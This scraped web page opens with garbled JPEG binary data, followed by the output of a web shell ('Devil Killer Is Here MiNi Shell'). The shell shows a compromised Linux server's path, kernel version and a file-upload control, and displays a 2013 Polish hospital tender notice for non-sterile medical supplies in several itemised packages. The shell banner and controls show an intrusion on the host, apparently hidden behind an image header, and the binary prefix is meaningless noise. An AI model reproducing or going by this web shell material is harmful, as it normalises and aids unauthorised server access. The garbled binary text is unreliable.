JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130731/153173-N-2013.html

<p class="kh_header"><b>Tarnowskie Góry: Sukcesywne dostawy niesterylnego sprzętu medycznego wielorazowego i jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 153173 - 2013; data zamieszczenia: 31.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy niesterylnego sprzętu medycznego wielorazowego i jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy niesterylnego sprzętu medycznego wielorazowego
         i jednorazowego użytku . Zamówienie składa się z 19 części tzw. Pakietów, z których każdy stanowi    
         oddzielny przedmiot zamówienia:   

Pakiet 1    Drobny sprzęt medyczny
Pakiet 2    Akcesoria do elektrochirurgii
Pakiet 3    Pieluchy dla dzieci 
Pakiet 4    Pieluchomajtki dla dorosłych, podkłady 
Pakiet 5    Pościel i ubranie operacyjne 
Pakiet 6    System do odsysania  wydzielin ustrojowych 
Pakiet 7    Materiały do EKG, EEG
Pakiet 8    Szyny Kramera i Zimmera 
Pakiet 9    Strzykawki Janet 
Pakiet 10  Maska oddechowa przeciwko zakażeniom drogami oddechowymi
Pakiet 11  Żel do USG 
Pakiet 12  Zestaw do przezskórnej endoskopowej gastrostomii 
Pakiet 13  Rurki rektoskopowe 
Pakiet 14  Igły do ostrzyknięć
Pakiet 15  Podkłady na rolce 
Pakiet 16  Koszulki przedoperacyjne
Pakiet 17  Ostrza do strzyżarki
Pakiet 18  Pojemniki
Pakiet 19  Prześcieradło

Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilość znajdują się w załącznikach 
     D.1 ÷ D.19 do SIWZ  - FORMULARZE  CENOWE..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [E] do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2) Strony dopuszczają zmiany umowy w zakresie:
- numeru katalogowego produktu (zmiana nr kat nie wymaga aneksowania umowy),
- nazwy handlowej produktu przy zachowaniu jego parametrów,
- gdy wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
- gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
- w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
- w razie konieczności zmiany miejsca dostawy,
- w przypadku zmiany wielkości opakowania wprowadzonej przez producenta, z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową,
Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.
3) Zamawiający dopuszcza zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny oraz zmiany w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskie Góry, ul. Pyskowicka 47-51 w Dział zamówień publicznych - budynek administracji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2013 godzina 10:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskie Góry, ul. Pyskowicka 47-51  Sekretariat - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Basen z tworzywa PCV	12	szt
2	Butelka (pojemnik) do dobowej zbiórki moczu 2,0l 	20	szt
3	Ciśnieniomierz z mankietem podlegającym działaniu środków dezynfekcyjnych ze słuchawkami	15	szt
4	Czepek  j.uż. harmonijka	3000	szt
5	Czepek j.uż. z taśmą przeciwpotną wiązany na troki	4500	szt
6	Czepek już.pielegniarski okrągły z gunką, włókninowy,  rozm. M-XL  ( 50cm - 60cm)  	3500	szt
7	Dozownik łokciowy typu Dermados dla obszaru medycznego, z pompką wykonaną z tworzywa sztucznego	10	szt
8	Drabinka pacjenta ułatwiająca siadanie	5	szt
9	Fartuch izolacyjny flizelinowy jednorazowego użytku zielony i niebieski wiązany na troki	6500	szt
10	Fartuch izolacyjny flizelinowy, podfoliowany jednorazowego użytku zielony	50	szt
11	Kaczki męskie z tworzywa PCV	20	szt
12	Kaczki tekturowe jednoraz.użytku	150	szt.
13	Obuwie operacyjne wielorazowego użyku nadające się do mycia i dezynfekcji oraz sterylizacji w temp. do 135 stopni C	15	par
14	Kasetka na leki dzienna 5-komorowa o  wym. ok.. 11x4cm	150	szt
15	Kieliszek do leków z tworzywa a 80 szt	250	op
16	Kubek na mocz 150 ml z polem do opisu niesterylny	15000	szt
17	Kubek na mocz 150 ml z polem do opisu sterylny	1300	szt
18	Kołnierz Schantza rozm.M; L	5	szt
19	Maska silikonowa do resuscytatora	5	szt
20	Maski j. użytku trójwarstwowe z trokami	7000	szt
21	Maski j. użytku trójwarstwowe z gumkami	7000	
22	Miski nerkowate duże z tworzywa PCV	10	szt
23	Miski nerkowate średnie z tworzywa PCV	10	szt
24	Nocnik dla dzieci j.u., tekturowy	100	szt
25	Okulary do fototerapii dla noworodków małe 26-34cm obw. głowy	50	szt
26	Okulary do fototerapii dla noworodków średnie większe niż 34cm obw. głowy	600	szt
27	Opaska identyfikacyjna dla dorosłych (opakowanie zbiorcze folia-papier)	7000	szt
28	Opaska identyfikacyjna dla noworodków (opakowanie zbiorcze folia-papier)	5500	szt
29	Opaska uciskowa automatyczna podlegająca działaniu środków dezynfekcyjnych	50	szt
30	Opaska uciskowa jednorazowego użytku,  bezlateksowa, perforowana, 25 szt.na rolce 	5	op
31	Osłonka USG endowaginalne puder a 144 szt.	25	op
32	Palnik do lamp bakteriobójczych TUV 30W G30T8 UV-C Long Live 	30	szt
33	Pojnik dla chorych	10	szt
34	Przecinak do tabletek	5	szt
35	Ramka  metalowa do kart gorączkowych	10	szt
36	Słuchawki lekarskie dla dorosłych	5	szt
37	Słuchawki lekarskie dla noworodków	1	szt
38	Stojaki do kroplówek	5	szt
39	Szczoteczka chirurgiczna do mycia rąk, wielorazowa, plastikowa z możliwością sterylizacji do 300 razy	25	szt
40	Szczoteczka do rurek tracheostomijnych  /mała/	10	szt
41	Szczotka do chirurgicznego mycia rąk j.użytku nasączona 4% glukonianem chlorheksydyny	150	szt
42	Szpatułki drewniane a 100szt.	220	op
43	Taca na leki	2	szt
44	Termometr bezrtęciowy do pomiaru temp.ciała  	25	szt.
45	Termometr elektroniczny do pomiaru temp.ciała  	70	szt
46	Termometr do lodówki	10	szt
47	Trzonek Nr 3; 4 do ostrzy chirurgicznych	5	szt
48	Utrwalacz cytologiczny typu Labofix, Fiksocyt	5	szt
49	Wanienka do dezynfekcji narzędzi poj. 10l (z sitem wyjmowanym)	5	szt
50	Wieszak do worka na mocz	500	szt
51	Woreczek do pobierania moczu u niemowląt (chłopcy dziewczynki	2000	szt
52	Worek do moczu 2l. Z odpływem niesterylny z zastawką antyzwrotną oraz zaworem w kształcie litery T	8000	szt
53	Worek do moczu 500ml na nogę z zaworem antyrefluksowym	100	szt
54	Worek na wydzieliny (wymiociny) z wkładką absorbcyjną poj. 1500 ml	50	szt
55	Wzierniki uszne o średnicy 3,6 mm	2500	szt
56	Zestaw do ćwiczeń oddechowych po zabiegu operacyjnym	10	szt
57	Zestaw do kolografii z barytem 	15	szt
58	Zestaw do lewatywy z drenem zakończonym jednym otworem centralnym i dwoma otworami bocznym 	2000	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2  Akcesoria do elektrochirurgii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Elektroda neutralna  jednorazowego użytku, dzielona, dla dorosłych i dzieci, pokryta klejem przewodzącym, nieprzepuszczające wilgoci, wymiary 176 x 122mm,pow. 110cm2 .                                                    	1700	szt.
2	Kabel do elektrody neutralnej z klipsem 2,5cm, wtyczka do generatora Emed, dł.4,5 m przeznaczony do minimum 300 cykli sterylizacji	10	szt.
3	Uchwyt monopolarny z dwoma przyciskami, trzonek 4mm, z kablem  4,5 m, całkowita długość uchwytu maksymalnie 15cm, przeznaczony do minimum 200 cykli sterylizacji.	10	szt.
4	Uchwyt monopolarny z dwoma przyciskami, trzonek 2,4mm, o głębokości 22mm z kablem  4,5 m, przeznaczony do minimum 200 cykli sterylizacji.	2	szt.
5	Elektroda nożowa, prosta, dł 62 mm, wymiary ostrza 2,6x0,6x13mm, trzonek 4 mm, przeznaczona do minimum 75 sterylizacji	20	szt.
6	Elektroda nożowa, prosta, przedłużona,  dł 138 - 154 mm, wymiary ostrza 2,6x0,6x13mm, trzonek 4 mm, przeznaczona do minimum 75 sterylizacji	7	szt.
7	Elektroda kulkowa, prosta, przedłużona, dł. 124 mm,  średnica kulki 6 mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji	2	szt.
8	Elektroda kulkowa prosta, dł 49mm,  średnica kulki 6 mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji	2	szt.
9	Elektroda kulkowa prosta, dł 49mm,  średnica kulki 4 mm, trzonek 4mm, przeznaczony do minimum 75 sterylizacji	2	szt.
10	Szczypce bipolarne ze stali nierdzewnej, izolowane, z trzpieniem naprowadzającym, zagięte, dł 195mm końcówka 8 x 1mm, przeznaczone do minimum 300 sterylizacji	5	szt.
11	Kabel do szczypiec bipolarnych, wtyczka 2-bolcowa 28mm, dł 4,5m, przeznaczony do minimum 300 sterylizacji	5	szt.
12	Kabel monopolarny do instrumentów laparoskopowych, wtyczka 1-pionowa 4mm, dł 4,5m, przeznaczony do minimum 300 sterylizacji	2	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3   Pieluchy dla dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pieluchy jedn.użytku             2 - 5 kg z wycięciem na kikut pępowinowy	1000	szt
2	Pieluchy jedn.użytku             3 - 6 kg	300	 szt
3	Pieluchy jedn.użytku           12- 25 kg                    	600	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4   Pieluchomajtki dla dorosłych, podkłady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pieluchomajtki dla dorosłych pokryte na całej powierzchni laminatem oddychającym, posiadające zapięcie typu przylepcorzepy, rozm.L	7000	 szt
2	Pieluchomajtki dla dorosłych pokryte na całej powierzchni laminatem oddychającym, posiadające zapięcie typu przylepcorzepy, rozm.XL	7000	 szt
3	Podkłady higieniczne nieprzemakalne z wkładem chłonnym wym. 60 x 90 	10000	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5  Pościel i ubranie operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pościel jednorazowa (powłoka 200x150, powłoczka90x75,prześcieradło210x150)	10	szt
2	Ubranie operacyjne niejałowe, rozmiar uniwersalny kolor zielony 	5	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6   System do odsysania  wydzielin ustrojowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wkład workowy jednorazowego użytku nie zawierający polichlorku winylu (PCV) z funkcją samozasysania, uszczelniany automatycznie z filtrem hydrofobowym - antybakteryjnym, tylko 1 króciec  w pokrywie, obrotowy, stopniowany;   substancja żelująca w środku pojemność 1000 ml	700 szt
2	Wkład workowy jednorazowego użytku nie zawierający polichlorku winylu (PCV) z funkcją samozasysania, uszczelniany automatycznie z filtrem hydrofobowym - antybakteryjnym, tylko 1 króciec  w pokrywie, obrotowy, stopniowany;   substancja żelująca w środku pojemność 2000 ml	1700 szt
3	Pojemnik wielorazowego użytku na wkłady workowe,wykonany z przeźroczystego poliwęglanu z certyfikowaną skalą pomiarową, wyposażony w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego, podłączony do źródła próżni na stałe, możliwość sterylizacji w 121st.C  o poj. 1000 ml	5 szt
4	Pojemnik wielorazowego użytku na wkłady workowe,wykonany z przeźroczystego poliwęglanu z certyfikowaną skalą pomiarową, wyposażony w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego, podłączony do źródła próżni na stałe, możliwość sterylizacji w 121st.C  o poj. 2000 ml	5 szt
5	Uchwyt na szynę typu MODURA, kompatybilny z pojemnikami	5 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
